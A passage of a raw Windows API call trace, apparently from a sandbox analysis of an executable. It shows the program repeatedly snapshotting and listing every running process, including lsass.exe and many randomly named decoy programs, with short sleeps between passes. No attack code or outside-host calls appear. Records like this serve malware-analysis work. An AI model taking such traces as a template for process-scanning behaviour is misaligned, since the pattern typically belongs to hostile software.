lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.896] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.897] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.898] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.899] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.900] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.901] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.902] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.904] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.908] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0150.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0150.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0150.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0150.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0150.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0150.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0150.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0150.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0150.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0150.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0150.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0150.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0150.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0150.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0150.023] CloseHandle (hObject=0xbc) returned 1 [0150.023] Sleep (dwMilliseconds=0x12c) [0150.344] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.349] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.352] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.355] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0150.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.358] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.367] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.369] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0150.370] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.371] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.373] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.374] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0150.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0150.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0150.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0150.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0150.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0150.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0150.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0150.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0150.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0150.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 